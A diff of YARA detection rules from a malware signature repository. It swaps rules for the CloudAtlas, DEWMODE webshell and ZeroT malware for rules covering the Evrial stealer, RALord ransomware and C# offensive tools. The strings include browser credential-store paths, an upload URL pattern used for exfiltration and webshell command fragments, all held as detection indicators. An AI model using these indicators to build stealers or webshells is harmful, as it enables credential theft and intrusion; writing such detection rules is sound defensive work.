+		description = "Detects Encrial credential stealer malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e7caf2b2-caf2-5984-a792-8224f2641bda"
-		date = "2020-10-13"
+		id = "8be5f0d8-013f-5070-9e19-9ac522c88693"
+		date = "2018-01-21"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/jfslowik/status/1316050637092651009"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cloudatlas.yar#L2-L16"
+		reference = "https://twitter.com/malwrhunterteam/status/953313514629853184"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_envrial.yar#L11-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "772bdd8ec89edf2054e675e9ecb321a7bfe0307a7086a4e5b65f8d8b8cf80ecc"
+		logic_hash = "f047bedaac4dd934657b282a2587c55f3087a7cceb1a80becf14e7db3c365e8b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "7ba76b2311736dbcd4f2817c40dae78f223366f2404571cd16d6676c7a640d70"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85"
+		hash2 = "9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d"
 
 	strings:
-		$x1 = "https://msofficeupdate.org" wide
+		$x1 = "/Evrial/master/domen" wide
+		$a1 = "\\Opera Software\\Opera Stable\\Login Data" wide
+		$a2 = "\\Comodo\\Dragon\\User Data\\Default\\Login Data" wide
+		$a3 = "\\Google\\Chrome\\User Data\\Default\\Login Data" wide
+		$a4 = "\\Orbitum\\User Data\\Default\\Login Data" wide
+		$a5 = "\\Kometa\\User Data\\Default\\Login Data" wide
+		$s1 = "dlhosta.exe" fullword wide
+		$s2 = "\\passwords.log" wide
+		$s3 = "{{ <>h__TransparentIdentifier1 = {0}, Password = {1} }}" fullword wide
+		$s4 = "files/upload.php?user={0}&hwid={1}" fullword wide
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 300KB and 1 of ( $x* )
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 3 of them or 2 of ( $s* ) )
 }
-rule SIGNATURE_BASE_APT_MAL_URL_Cloudatlas_Oct20_2 : FILE
+rule SIGNATURE_BASE_MAL_WIN_Ralordv1_Apr25 : FILE
 {
 	meta:
-		description = "Detects unknown maldoc dropper noticed in October 2020 - file morgue6visible5bunny6culvert7ambo5nun1illuminate4.url"
-		author = "Florian Roth (Nextron Systems)"
-		id = "91f6362f-1793-58a3-a750-04ec9812b9df"
-		date = "2020-10-13"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/jfslowik/status/1316050637092651009"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cloudatlas.yar#L18-L37"
+		description = "This ISH Tecnologia Yara rule, detects the main components of the first version of RALord Ransomware"
+		author = "0x0d4y-Icaro Cesar"
+		id = "67254633-3597-4770-9806-8b2e26c8f66a"
+		date = "2025-04-01"
+		modified = "2025-04-18"
+		reference = "https://ish.com.br/wp-content/uploads/2025/04/RALord-Novo-grupo-de-Ransomware-as-a-Service-1.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_ralordv1_win_ap25.yar#L1-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8bb60c262a34babbe8839f5d39d1c972eeb41ea77eaae02cc877d908c7033f13"
-		score = 75
+		hash = "be15f62d14d1cbe2aecce8396f4c6289"
+		logic_hash = "75d20cca5eb48109bbb3b0ab0ce2efb4f2d89bc1984df8c4fddf1f859d069750"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		hash1 = "a6a58b614a9f5ffa1d90b5d42e15521f52e2295f02c1c0e5cd9cbfe933303bee"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		rule_matching_tlp = "TLP:WHITE"
+		rule_sharing_tlp = "TLP:WHITE"
+		malpedia_family = "win.ralord"
 
 	strings:
-		$hc1 = { 5B 49 6E 74 65 72 6E 65 74 53 68 6F 72 74 63 75
-               74 5D 0D 0A 55 52 4C 3D 68 74 74 70 73 3A 2F 2F
-               6D 73 6F 66 66 69 63 65 75 70 64 61 74 65 2E 6F
-               72 67 }
+		$code_pattern_quarterround = { 4? 31 ?? 48 8b ?? ?? ?? 4? 31 ?? 48 8b ?? ?? ?? 31 e8 4? 31 ?? 41 c1 ?? 0c c1 ?? 0c c1 ?? 0c 48 89 c2 c1 ?? 0c }
+		$code_pattern_custom_alg = { 0f 57 ?? 0f 10 ?? c5 ?? ?? ?? ?? 0f 57 ?? 0f 10 ?? c5 ?? ?? ?? ?? 0f 57 ?? 0f 10 ?? c5 ?? ?? ?? ?? 0f 57 ?? 0f 11 ?? c5 ?? ?? ?? ?? 0f 11 ?? c5 ?? ?? ?? ?? 0f 11 ?? c5 ?? ?? ?? ?? 0f 11 ?? c5 ?? ?? ?? ?? 48 83 c0 08 48 3d 8? }
+		$ralord_str_I = "chacha" ascii
+		$ralord_str_II = "scorp" ascii
+		$ralord_str_III = "RALord" ascii
+		$ralord_str_IV = "onion" ascii
+		$ralord_str_V = "/rust" ascii
+		$ralord_str_VI = "BCryptGenRandom" ascii
 
 	condition:
-		uint16( 0 ) == 0x495b and filesize < 200 and $hc1 at 0
+		uint16( 0 ) == 0x5a4d and all of ( $code_pattern_* ) and 4 of ( $ralord_str_* )
 }
-rule SIGNATURE_BASE_WEBSHELL_APT_PHP_DEWMODE_UNC2546_Feb21_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Csharpsetthreadcontext : FILE
 {
 	meta:
-		description = "Detects DEWMODE webshells"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ea883f25-0e9b-5617-b05e-191a4a5c5a52"
-		date = "2021-02-22"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc2546_dewmode.yar#L2-L25"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "883bb859-d5ab-501d-8c83-0c5a2cf1f6c8"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/djhohnstein/CSharpSetThreadContext"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L6-L20"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "86ce185f6350eb7485bce5bd31d91085fed25aa8ce78813e1c3c3dffbaae58ff"
+		logic_hash = "1fab70ce4bb1a00d8e8155ce7d859aa2f8d193dd40378a8fff0fdfb1c94f9a76"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
-		hash1 = "2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7"
-		hash2 = "5fa2b9546770241da7305356d6427847598288290866837626f621d794692c1b"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "<font size=4>Cleanup Shell</font></a>';" ascii fullword
-		$x2 = "$(sh /tmp/.scr)"
-		$x3 = "@system('sudo /usr/local/bin/admin.pl --mount_cifs=" ascii
-		$s1 = "target=\\\"_blank\\\">Download</a></td>\";" ascii
-		$s2 = ",PASSWORD 1>/dev/null 2>/dev/null');" ascii
-		$s3 = ",base64_decode('" ascii
-		$s4 = "include \"remote.inc\";" ascii
-		$s5 = "@system('sudo /usr/local" ascii
+		$typelibguid0lo = "a1e28c8c-b3bd-44de-85b9-8aa7c18a714d" ascii wide
+		$typelibguid1lo = "87c5970e-0c77-4182-afe2-3fe96f785ebb" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x3f3c and filesize < 9KB and ( 1 of ( $x* ) or 2 of them ) or 3 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_PP_CN_APT_Zerot_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_DLL_Injection : FILE
 {
 	meta:
-		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c16f3abb-ac7e-5d5f-b8d7-b105cff3886e"
-		date = "2017-02-03"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L11-L24"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "aec4fc28-9aa2-5eef-9fb1-d187a83a72b3"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/ihack4falafel/DLL-Injection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L22-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ad3018e6aa377b5032b04226ecb1e27b2cc7bc8294455ea51e426b5182ed7821"
+		logic_hash = "a9ad0c7a68602214cf31d9b065b9b2c5f7eb616bcec0f3428e958c0f762282b2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "09061c603a32ac99b664f7434febfc8c1f9fd7b6469be289bb130a635a6c47c0"
 
 	strings:
-		$s1 = "suprise.exe" fullword ascii
+		$typelibguid0lo = "3d7e1433-f81a-428a-934f-7cc7fcf1149d" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_PP_CN_APT_Zerot_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Limeusb_Csharp : FILE
 {
 	meta:
-		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8433216e-1189-568c-bd18-051fb1fec215"
-		date = "2017-02-03"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L26-L39"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "dfa96b36-e84c-510b-b16b-bd686777b83d"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/NYAN-x-CAT/LimeUSB-Csharp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L37-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e31ade3690938fe0999423fbe446d9426e14abd01ebbada4eed8bddb1e2c9ea6"
+		logic_hash = "cd5b12c43046e56ebef78104fd7a9389476686bd4adca4964fc8b559432ae236"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "74eb592ef7f5967b14794acdc916686e061a43169f06e5be4dca70811b9815df"
 
 	strings:
-		$s1 = "NO2-2016101902.exe" fullword ascii
+		$typelibguid0lo = "94ea43ab-7878-4048-a64e-2b21b3b4366d" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_PP_CN_APT_Zerot_3 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Ladon : FILE
 {
 	meta:
-		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "99aa29cf-d962-5a3d-bd28-6486c40822bb"
-		date = "2017-02-03"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L41-L59"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "57e3d2fa-d430-561b-9d42-cf58cda5ed7a"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/k8gege/Ladon"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L52-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6920febf177667610e3edb8ba88ec137d085a867c1d6a570d4785fcc9cc62d49"
+		logic_hash = "1a2c6d3bb2964847aaff4828bbd7b75301e287bcff3f27324bc7767c0f73820f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ee2e2937128dac91a11e9bf55babc1a8387eb16cebe676142c885b2fc18669b2"
 
 	strings:
-		$s1 = "/svchost.exe" fullword ascii
-		$s2 = "RasTls.dll" fullword ascii
-		$s3 = "20160620.htm" fullword ascii
-		$s4 = "* $l&$" fullword ascii
-		$s5 = "dfjhmh" fullword ascii
-		$s6 = "/20160620.htm" fullword ascii
+		$typelibguid0lo = "c335405f-5df2-4c7d-9b53-d65adfbed412" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5449 and filesize < 1000KB and 3 of them ) or ( all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_PP_CN_APT_Zerot_4 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Whitelistevasion : FILE
 {
 	meta:
-		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b21961ee-d346-51d3-bacd-02554240162d"
-		date = "2017-02-03"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L61-L75"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "cd2740d0-0315-5a32-b34a-1998024fcc06"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/khr0x40sh/WhiteListEvasion"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L67-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8011497e7d061a9ebde06667e47b5cd9469a433e0be1401d70637e7ace8e8155"
+		logic_hash = "38838b45c3c7359e49f890f5f7608e5a6026421e83b0ef7371c8558c571395a6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a9519d2624a842d2c9060b64bb78ee1c400fea9e43d4436371a67cbf90e611b8"
 
 	strings:
-		$s1 = "Mcutil.dll" fullword ascii
-		$s2 = "mcut.exe" fullword ascii
+		$typelibguid0lo = "858386df-4656-4a1e-94b7-47f6aa555658" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_PP_CN_APT_Zerot_5 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Lime_Downloader : FILE
 {
 	meta:
-		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2a7c6a36-aace-562e-bbc4-425c1d93fab1"
-		date = "2017-02-03"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L77-L95"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "bfb0f97c-6d95-5e11-ad11-5297bcf7c3df"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/NYAN-x-CAT/Lime-Downloader"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L82-L95"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fbc1a2e078cfae7a9c72612b9c769e84d8c1d59c89e05001571ad00071e38577"
+		logic_hash = "8086f6be648bcb5535b98aafc5fd898dc975273eec3c19a54263f74bb7c0f629"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "74dd52aeac83cc01c348528a9bcb20bbc34622b156f40654153e41817083ba1d"
 
 	strings:
-		$x1 = "dbozcb" fullword ascii
-		$s1 = "nflogger.dll" fullword ascii
-		$s2 = "/svchost.exe" fullword ascii
-		$s3 = "1207.htm" fullword ascii
-		$s4 = "/1207.htm" fullword ascii
+		$typelibguid0lo = "ec7afd4c-fbc4-47c1-99aa-6ebb05094173" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5449 and filesize < 1000KB and 1 of ( $x* ) and 1 of ( $s* ) ) or ( all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_PP_CN_APT_Zerot_6 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Darkeye : FILE
 {
 	meta:
-		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2e3bb4bd-5e20-56e7-a82b-d717d83eaeeb"
-		date = "2017-02-03"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L97-L111"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5dc6702f-a398-5be2-9df8-9a2ddc636a1f"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/K1ngSoul/DarkEye"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L97-L110"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2de78012cc384211cef6c12817fd8cef9d93eef6de3197d0cfec64c1a8022ae3"
+		logic_hash = "7571ed93fd3ea690549ab35682b0073e1c2b9ac57e36394d35794aba7c50b79e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a16078c6d09fcfc9d6ff7a91e39e6d72e2d6d6ab6080930e1e2169ec002b37d3"
 
 	strings:
-		$s1 = "jGetgQ|0h9=" fullword ascii
-		$s2 = "\\sfxrar32\\Release\\sfxrar.pdb"
+		$typelibguid0lo = "0bdb9c65-14ed-4205-ab0c-ea2151866a7f" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_PP_CN_APT_Zerot_7 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpkatz : FILE
 {
 	meta:
-		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e9cdca86-84a8-5673-935c-c319b523674b"
-		date = "2017-02-03"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L113-L129"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ff084b4c-4b00-5504-85ee-d6d17b5be504"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/b4rtik/SharpKatz"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L112-L125"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "87ab6cd5c769e7e38bef807fa7d15af3a66fed8fdb7fed49fa62d87e1049ceb4"
+		logic_hash = "8899192a8006bb31ce4277fc371a30b301ffc1a42030ca3a4059a2b53c889bae"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fc2d47d91ad8517a4a974c4570b346b41646fac333d219d2f1282c96b4571478"
 
 	strings:
-		$s1 = "RasTls.dll" fullword ascii
-		$s2 = "RasTls.exe" fullword ascii
-		$s4 = "LOADER ERROR" fullword ascii
-		$s5 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+		$typelibguid0lo = "8568b4c1-2940-4f6c-bf4e-4383ef268be9" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_PP_CN_APT_Zerot_8 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Externalc2 : FILE
 {
 	meta:
-		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f9a4f092-c699-5e91-9667-64ffe1b02bc1"
-		date = "2017-02-03"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L131-L147"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "1bbdfbb9-a3e8-5ffe-9db9-b50937e6a14d"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/ryhanson/ExternalC2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L127-L141"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a1d5e72970919cd5c0493f8882cbc6fb1bb3c5b6517813a4022efd0028dfe728"
+		logic_hash = "81042972411ab82da8460f9e263614f563bc67e3ce585f1a955b565b066ee8c9"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4ef91c17b1415609a2394d2c6c353318a2503900e400aab25ab96c9fe7dc92ff"
 
 	strings:
-		$s1 = "/svchost.exe" fullword ascii
-		$s2 = "RasTls.dll" fullword ascii
-		$s3 = "20160620.htm" fullword ascii
-		$s4 = "/20160620.htm" fullword ascii
+		$typelibguid0lo = "7266acbb-b10d-4873-9b99-12d2043b1d4e" ascii wide
+		$typelibguid1lo = "5d9515d0-df67-40ed-a6b2-6619620ef0ef" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5449 and filesize < 1000KB and 3 of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_PP_CN_APT_Zerot_9 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Povlsomware : FILE
 {
 	meta:
-		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e1c32993-409c-5a62-8239-cff99fb83a7f"
-		date = "2017-02-03"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L149-L163"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0eba43d2-b415-5e72-9677-4a3238ff7c34"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/povlteksttv/Povlsomware"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L143-L156"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "af4b85ef01c4fa21a2506369f3bc0f8eff6e95a4cfd494e1ea11a44d75bb024e"
+		logic_hash = "f8e246080ffcaa73ad727d2d9a1f2b75f2d413b49dff0c3b50831a41e1f14a2f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a685cf4dca6a58213e67d041bba637dca9cb3ea6bb9ad3eae3ba85229118bce0"
 
 	strings:
-		$x1 = "nflogger.dll" fullword ascii
-		$s7 = "Zlh.exe" fullword ascii
+		$typelibguid0lo = "fe0d5aa7-538f-42f6-9ece-b141560f7781" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_CN_APT_Zerot_Nflogger : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Runshellcode : FILE
 {
 	meta:
-		description = "Chinese APT by Proofpoint ZeroT RAT  - file nflogger.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0d23f312-e3b6-5c23-855b-25ae54265512"
-		date = "2017-02-04"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L165-L178"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "249da967-68b0-59b1-b414-4eb4fe67b8f3"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/zerosum0x0/RunShellcode"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L158-L171"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dc9b19e3c4c321cb9f840ec9ff78bec9e4a075cc62ea2823d92a3fbd9f99cc07"
+		logic_hash = "5df20e170651f32e41a905992d0bb52542638e2d0a56841db900b70e324c9afe"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "946adbeb017616d56193a6d43fe9c583be6ad1c7f6a22bab7df9db42e6e8ab10"
 
 	strings:
-		$x1 = "\\LoaderDll.VS2010\\Release\\" ascii
+		$typelibguid0lo = "a3ec18a3-674c-4131-a7f5-acbed034b819" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
